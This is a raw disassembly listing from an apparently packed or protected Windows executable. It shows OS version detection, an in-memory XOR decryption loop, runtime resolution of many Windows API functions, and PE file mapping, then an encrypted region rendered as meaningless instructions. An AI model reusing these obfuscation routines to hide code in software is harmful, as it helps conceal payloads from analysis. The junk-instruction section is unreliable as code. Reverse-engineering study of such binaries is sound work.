loc_4CE14E: ; CODE XREF: _4:004CE0E1�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+4], 3
jnz short loc_4CE169
mov dword ptr [ebp-0F0h], offset aWindowsnt3_51 ; "WindowsNT(3.51)"
jmp loc_4CE1EB
; ---------------------------------------------------------------------------
loc_4CE169: ; CODE XREF: _4:004CE158�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+4], 4
jnz short loc_4CE181
mov dword ptr [ebp-0F0h], offset aWindowsnt4_0 ; "WindowsNT(4.0)"
jmp short loc_4CE1EB
; ---------------------------------------------------------------------------
loc_4CE181: ; CODE XREF: _4:004CE173�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+4], 5
jnz short loc_4CE1E1
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_4CE1A5
mov dword ptr [ebp-0F0h], offset aWindows2000 ; "Windows2000"
jmp short loc_4CE1DF
; ---------------------------------------------------------------------------
loc_4CE1A5: ; CODE XREF: _4:004CE197�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 1
jnz short loc_4CE1BD
mov dword ptr [ebp-0F0h], offset aWindowsxp ; "WindowsXP"
jmp short loc_4CE1DF
; ---------------------------------------------------------------------------
loc_4CE1BD: ; CODE XREF: _4:004CE1AF�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 2
jnz short loc_4CE1D5
mov dword ptr [ebp-0F0h], offset aWindows_net ; "Windows.NET"
jmp short loc_4CE1DF
; ---------------------------------------------------------------------------
loc_4CE1D5: ; CODE XREF: _4:004CE1C7�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_4CE1DF: ; CODE XREF: _4:004CE1A3�j _4:004CE1BB�j ...
jmp short loc_4CE1EB
; ---------------------------------------------------------------------------
loc_4CE1E1: ; CODE XREF: _4:004CE18B�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_4CE1EB: ; CODE XREF: _4:004CE0E3�j _4:004CE0F2�j ...
mov edx, [ebp-0ECh]
mov [ebp-108h], edx
mov eax, [ebp-108h]
push eax
call sub_4D83DD
add esp, 4
mov ecx, ds:dword_4E1684
mov edx, [ecx+2Ch]
mov [ebp-0F4h], edx
cmp dword ptr [ebp-0F4h], 0
jz short loc_4CE28F
mov eax, [ebp-0F4h]
mov [ebp-0FCh], eax
mov dword ptr [ebp-0F8h], 0
jmp short loc_4CE245
; ---------------------------------------------------------------------------
loc_4CE236: ; CODE XREF: _4:004CE28D�j
mov ecx, [ebp-0F8h]
add ecx, 1
mov [ebp-0F8h], ecx
loc_4CE245: ; CODE XREF: _4:004CE234�j
cmp dword ptr [ebp-0F8h], 80h
jge short loc_4CE28F
mov edx, [ebp-0FCh]
imul edx, 19660Dh
add edx, 3C6EF35Fh
mov [ebp-0FCh], edx
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov edx, [ecx+eax*4]
xor edx, [ebp-0FCh]
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov [ecx+eax*4], edx
jmp short loc_4CE236
; ---------------------------------------------------------------------------
loc_4CE28F: ; CODE XREF: _4:004CE21C�j _4:004CE24F�j
mov edx, ds:dword_4E1684
mov eax, [edx+24h]
and eax, 10h
neg eax
sbb eax, eax
neg eax
mov ds:byte_4E1694, al
call sub_4D4DC0
mov ecx, [ebp-14h]
mov [ebp+8], ecx
cmp ds:dword_4E5A54, 0
jz short loc_4CE2CD
push 0
push 0
push 0
mov edx, ds:dword_4E5A54
push edx
call ds:dword_4E1838 ; PostMessageA
loc_4CE2CD: ; CODE XREF: _4:004CE2B8�j
xor eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CE2E0 proc near ; CODE XREF: sub_4CD2E0+3BE�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4DE014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4CE30B
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4DE00C ; RaiseException
loc_4CE30B: ; CODE XREF: sub_4CE2E0+18�j
push offset aClosehandle ; "CloseHandle"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16A4, eax
push offset aCreatefilea ; "CreateFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16A8, eax
push offset aCreatefilew ; "CreateFileW"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16AC, eax
push offset aCreatefilemapp ; "CreateFileMappingA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16B0, eax
push offset aCreatefilema_0 ; "CreateFileMappingW"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16B4, eax
push offset aCreateprocessa ; "CreateProcessA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16B8, eax
push offset aDebugbreak ; "DebugBreak"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16BC, eax
push offset aDeletefilea ; "DeleteFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16C0, eax
push offset aEntercriticals ; "EnterCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16C4, eax
push offset aExitprocess ; "ExitProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16C8, eax
push offset aFindclose ; "FindClose"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16CC, eax
push offset aFindfirstfilea ; "FindFirstFileA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16D0, eax
push offset aFindnextfilea ; "FindNextFileA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16D4, eax
push offset aFlushfilebuffe ; "FlushFileBuffers"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16D8, eax
push offset aFormatmessagea ; "FormatMessageA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16DC, eax
push offset aFreelibrary ; "FreeLibrary"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16E0, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16E4, eax
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16E8, eax
push offset aGetenvironment ; "GetEnvironmentVariableA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16EC, eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16F0, eax
push offset aGetfileattribu ; "GetFileAttributesA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16F4, eax
push offset aGetfileattri_0 ; "GetFileAttributesW"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16F8, eax
push offset aGetfileinforma ; "GetFileInformationByHandle"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E16FC, eax
push offset aGetfilesize ; "GetFileSize"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1700, eax
push offset aGetfiletime ; "GetFileTime"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1704, eax
push offset aGetfullpathnam ; "GetFullPathNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1708, eax
push offset aGetfullpathn_0 ; "GetFullPathNameW"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E170C, eax
push offset aGetlasterror ; "GetLastError"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1710, eax
push offset aGetmodulefilen ; "GetModuleFileNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1714, eax
push offset aGetmodulehandl ; "GetModuleHandleA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1718, eax
push offset aGetprivateprof ; "GetPrivateProfileIntA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E171C, eax
push offset aGetprivatepr_0 ; "GetPrivateProfileSectionNamesA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1720, eax
push offset aGetprivatepr_1 ; "GetPrivateProfileStringA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1724, eax
push offset aGetprocaddress ; "GetProcAddress"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1728, eax
push offset aGetsystemtimea ; "GetSystemTimeAsFileTime"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E172C, eax
push offset aGettempfilenam ; "GetTempFileNameA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1730, eax
push offset aGettemppatha ; "GetTempPathA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1734, eax
push offset aGetversionexa ; "GetVersionExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1738, eax
push offset aGettickcount ; "GetTickCount"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E173C, eax
push offset aHeapalloc ; "HeapAlloc"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1740, eax
push offset aHeapfree ; "HeapFree"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1744, eax
push offset aHeapcreate ; "HeapCreate"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1748, eax
push offset aInitializecrit ; "InitializeCriticalSection"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E174C, eax
push offset aDeletecritical ; "DeleteCriticalSection"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1750, eax
push offset aLeavecriticals ; "LeaveCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1754, eax
push offset aLoadlibrarya ; "LoadLibraryA"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E175C, eax
push offset aLoadlibraryexa ; "LoadLibraryExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1758, eax
push offset aLocalalloc ; "LocalAlloc"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1760, eax
push offset aLocalfree ; "LocalFree"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1764, eax
push offset aLockfile ; "LockFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1768, eax
push offset aMapviewoffile ; "MapViewOfFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E176C, eax
push offset aMultibytetowid ; "MultiByteToWideChar"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1770, eax
push offset aOpenprocess ; "OpenProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1774, eax
push offset aRaiseexception ; "RaiseException"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1778, eax
push offset aReadfile ; "ReadFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E177C, eax
push offset aSetenvironment ; "SetEnvironmentVariableA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1780, eax
push offset aSetevent ; "SetEvent"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1784, eax
push offset aSetfilepointer ; "SetFilePointer"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1788, eax
push offset aSetlasterror ; "SetLastError"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E178C, eax
push offset aSetunhandledex ; "SetUnhandledExceptionFilter"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1790, eax
push offset aSleep ; "Sleep"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1794, eax
push offset aTerminateproce ; "TerminateProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1798, eax
push offset aUnlockfile ; "UnlockFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E179C, eax
push offset aUnmapviewoffil ; "UnmapViewOfFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17A0, eax
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17A4, eax
push offset aVirtualfree ; "VirtualFree"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17A8, eax
push offset aVirtualprotect ; "VirtualProtect"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17AC, eax
push offset aVirtualquery ; "VirtualQuery"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17B0, eax
push offset aWaitforsingleo ; "WaitForSingleObject"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17B4, eax
push offset aWidechartomult ; "WideCharToMultiByte"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17B8, eax
push offset aWritefile ; "WriteFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17BC, eax
push offset aLstrcmpia ; "lstrcmpiA"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17C0, eax
push offset aUser32_dll_0 ; "user32.dll"
call ds:dword_4E175C ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4CE8D0
push 0
push 0
push 0
push 0EF0000F7h
call ds:dword_4DE00C ; RaiseException
loc_4CE8D0: ; CODE XREF: sub_4CE2E0+5DD�j
push offset aChangedisplays ; "ChangeDisplaySettingsA"
mov eax, [ebp+var_10]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17C4, eax
push offset aCharupperbuffa ; "CharUpperBuffA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17C8, eax
push offset aLoadimagea ; "LoadImageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17CC, eax
push offset aMessageboxa_0 ; "MessageBoxA"
mov eax, [ebp+var_10]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17D0, eax
push offset aWsprintfa ; "wsprintfA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17D4, eax
push offset aWvsprintfa ; "wvsprintfA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17D8, eax
push offset aGdi32_dll_0 ; "gdi32.dll"
call ds:dword_4E175C ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4CE96D
push 0
push 0
push 0
push 0EF0000F6h
call ds:dword_4DE00C ; RaiseException
loc_4CE96D: ; CODE XREF: sub_4CE2E0+67A�j
push offset aAddfontresourc ; "AddFontResourceA"
mov eax, [ebp+var_8]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17DC, eax
push offset aCreatecompat_0 ; "CreateCompatibleDC"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17E0, eax
push offset aCreatedibsec_0 ; "CreateDIBSection"
mov edx, [ebp+var_8]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17E4, eax
push offset aDeletedc_0 ; "DeleteDC"
mov eax, [ebp+var_8]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17E8, eax
push offset aRemovefontreso ; "RemoveFontResourceA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17EC, eax
push offset aBeginpaint ; "BeginPaint"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17F0, eax
push offset aEndpaint ; "EndPaint"
mov eax, [ebp+var_10]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17F4, eax
push offset aGetobjecta ; "GetObjectA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17F8, eax
push offset aSelectobject_0 ; "SelectObject"
mov edx, [ebp+var_8]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E17FC, eax
push offset aDeleteobject_0 ; "DeleteObject"
mov eax, [ebp+var_8]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1800, eax
push offset aBitblt_0 ; "BitBlt"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1804, eax
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1808, eax
push offset aSetactivewindo ; "SetActiveWindow"
mov eax, [ebp+var_10]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E180C, eax
push offset aSetforegroundw ; "SetForegroundWindow"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1810, eax
push offset aRegisterclasse ; "RegisterClassExA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1814, eax
push offset aGetsystemmetri ; "GetSystemMetrics"
mov eax, [ebp+var_10]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1818, eax
push offset aCreatewindowex ; "CreateWindowExA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E181C, eax
push offset aGetmessagea ; "GetMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1820, eax
push offset aTranslatemessa ; "TranslateMessage"
mov eax, [ebp+var_10]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1824, eax
push offset aDispatchmessag ; "DispatchMessageA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1828, eax
push offset aDestroywindo_0 ; "DestroyWindow"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E182C, eax
push offset aEnumwindows ; "EnumWindows"
mov eax, [ebp+var_10]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1830, eax
push offset aDefwindowproca ; "DefWindowProcA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1834, eax
push offset aPostmessagea ; "PostMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1838, eax
push offset aCreatethread ; "CreateThread"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E183C, eax
mov [ebp+var_4], offset dword_4E16A4
mov [ebp+var_14], offset dword_4E1840
jmp short loc_4CEB7A
; ---------------------------------------------------------------------------
loc_4CEB71: ; CODE XREF: sub_4CE2E0:loc_4CEBA9�j
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
loc_4CEB7A: ; CODE XREF: sub_4CE2E0+88F�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_14]
jz short loc_4CEBAB
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_4CEBA9
push 0
push 0
push 0
mov ecx, [ebp+var_4]
sub ecx, offset dword_4E16A0
sar ecx, 2
sub ecx, 10FFEFFFh
push ecx
call ds:dword_4DE00C ; RaiseException
loc_4CEBA9: ; CODE XREF: sub_4CE2E0+8A8�j
jmp short loc_4CEB71
; ---------------------------------------------------------------------------
loc_4CEBAB: ; CODE XREF: sub_4CE2E0+8A0�j
mov esp, ebp
pop ebp
retn
sub_4CE2E0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE298
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-24h], 0FFFFFFFFh
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-28h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call ds:dword_4E16A8 ; CreateFileA
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short loc_4CEC6C
push 0
mov ecx, [ebp-24h]
push ecx
call ds:dword_4E1700 ; GetFileSize
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0FFFFFFFFh
jz short loc_4CEC6C
push 0
mov edx, [ebp-1Ch]
push edx
push 0
push 2
push 0
mov eax, [ebp-24h]
push eax
call ds:dword_4E16B0 ; CreateFileMappingA
mov [ebp-20h], eax
cmp dword ptr [ebp-20h], 0
jz short loc_4CEC6C
mov ecx, [ebp-1Ch]
push ecx
push 0
push 0
push 4
mov edx, [ebp-20h]
push edx
call ds:dword_4E176C ; MapViewOfFile
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jnz short loc_4CEC76
loc_4CEC6C: ; CODE XREF: _4:004CEC19�j _4:004CEC2E�j ...
mov ecx, 0EF000001h
call sub_4D8342
loc_4CEC76: ; CODE XREF: _4:004CEC6A�j
mov eax, [ebp-28h]
mov ecx, [ebp-28h]
add ecx, [eax+3Ch]
mov [ebp-30h], ecx
mov edx, [ebp-30h]
cmp dword ptr [edx], 4550h
jz short loc_4CEC97
mov ecx, 0EF000002h
call sub_4D8342
loc_4CEC97: ; CODE XREF: _4:004CEC8B�j
mov eax, ds:off_4E169C
mov [ebp-34h], eax
mov ecx, [ebp-30h]
mov edx, [ebp+10h]
sub edx, [ecx+34h]
mov [ebp-2Ch], edx
push 1190000h
call sub_4CDB7E
add ds:11417799h, cl ; CODE XREF: _4:004CECCB�j
stosd
add eax, 1EEE403Fh
sub al, 39h
inc esi
cmp ebx, [eax+1F877A6Dh]
in al, dx
jle short near ptr loc_4CECB5+2
inc ebx
cwde
out dx, al
pop es
xor eax, [ebx+78F72316h]
adc byte ptr [edi+64h], 71h
jle short near ptr loc_4CED3B+2
xchg eax, ecx
db 2Eh
out 77h, eax
dec edi
sbb esp, edi
jp short loc_4CED3B
lds edx, [ecx+4B7AFC62h]
retn
; ---------------------------------------------------------------------------
db 7Eh, 3Bh, 82h
dd 0B61C1F80h, 0E756D0C3h, 1E5F126Fh, 6B46D1A8h, 0EE0CA412h
dd 0D165F518h, 0AB6AFC15h, 0F6588337h, 5A597004h, 1A93DEAh
dd 35E370C2h, 328E108Eh, 0EA5487D7h, 599515B8h, 0DC957533h
dd 2AB9E510h, 0F6E956BFh, 41D55588h
db 0F7h, 6Ch, 0DAh
; ---------------------------------------------------------------------------
loc_4CED3B: ; CODE XREF: _4:004CECE4�j _4:004CECDB�j
adc edi, [edi+14D244FBh]
stc
jnz short loc_4CED91
loc_4CED44: ; CODE XREF: _4:004CED45�j
xchg eax, edi
loop loc_4CED44
rol esi, 1
inc esp
stosb
arpl bx, si
and ebx, [edx+ecx*2+1D4529E4h] ; CODE XREF: _4:004CEDC7�j
out 68h, al
mov esi, 7AF0DD8Eh
mov bl, 0DFh
xchg eax, ebp
jno short loc_4CED9A
jg short loc_4CED80
shr byte ptr [ebx], cl
jg short loc_4CEDCE
mov bh, 10h
cmpsd
mov ah, 2Ah
hlt
; ---------------------------------------------------------------------------
dd 693DAD50h, 3BA234CFh, 6A1346DFh, 8E90F8F4h, 59E2CEABh
; ---------------------------------------------------------------------------
loc_4CED80: ; CODE XREF: _4:004CED60�j
mov ah, [edx+edx*4]
aam 3Bh
stosd
push 7118CCF6h
jle short loc_4CEDB7
add eax, eax
push 0FFFFFFC4h
loc_4CED91: ; CODE XREF: _4:004CED42�j
outsb
loope near ptr loc_4CEDEE+3
cmpsb
cmp al, 76h
inc edi
iret
; ---------------------------------------------------------------------------
daa
loc_4CED9A: ; CODE XREF: _4:004CED5E�j
jge short near ptr loc_4CEDC9+1
pop edi
or esi, ebp
aas
jnb short near ptr loc_4CEE04+2
db 67h
das
mov bl, 0C0h
and al, 0E9h
sbb [ebx], cl
dec cl
pop esi
aam 35h
inc edx
dec edi
pop esp
loc_4CEDB2: ; DATA XREF: _5:004DE2A8�o
and byte ptr [esi+3Bh], 91h
popf
loc_4CEDB7: ; CODE XREF: _4:004CED8B�j
stosb
mov bh, 7
loc_4CEDBA: ; DATA XREF: _5:004DE2AC�o
pop edx
mov ebx, 0EE403F03h
pop ds
sub al, 39h
inc esi
loc_4CEDC4: ; CODE XREF: _4:004CEDD4�j
cmp edi, [ecx+6Ch]
jp short near ptr loc_4CED4D+3
loc_4CEDC9: ; CODE XREF: _4:loc_4CED9A�j
jl short near ptr loc_4CEDD6+6
inc ebx
inc esp
aaa
loc_4CEDCE: ; CODE XREF: _4:004CED64�j
nop
nop
xor edx, edx
test edx, edx
jnz short loc_4CEDC4
loc_4CEDD6: ; CODE XREF: _4:loc_4CEDC9�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4CEDE4
jmp short loc_4CEE15
; =============== S U B R O U T I N E =======================================
sub_4CEDE4 proc near ; CODE XREF: _4:004CEDDD�p
; DATA XREF: _5:004DE2A0�o
cmp dword ptr [ebp-28h], 0
jz short loc_4CEDF4
mov eax, [ebp-28h]
push eax
loc_4CEDEE: ; CODE XREF: _4:004CED92�j
call ds:dword_4E17A0 ; UnmapViewOfFile
loc_4CEDF4: ; CODE XREF: sub_4CEDE4+4�j
cmp dword ptr [ebp-20h], 0
jz short loc_4CEE04
mov ecx, [ebp-20h]
push ecx
call ds:dword_4E16A4 ; CloseHandle
loc_4CEE04: ; CODE XREF: sub_4CEDE4+14�j
; _4:004CEDA0�j
cmp dword ptr [ebp-24h], 0
jz short locret_4CEE14
mov edx, [ebp-24h]
push edx
call ds:dword_4E16A4 ; CloseHandle
locret_4CEE14: ; CODE XREF: sub_4CEDE4+24�j
retn
sub_4CEDE4 endp
; ---------------------------------------------------------------------------
loc_4CEE15: ; CODE XREF: _4:004CEDE2�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE2B0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE88h
push ebx
push esi
push edi
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 105h
call sub_4D835A
add esp, 4
mov [ebp-184h], eax
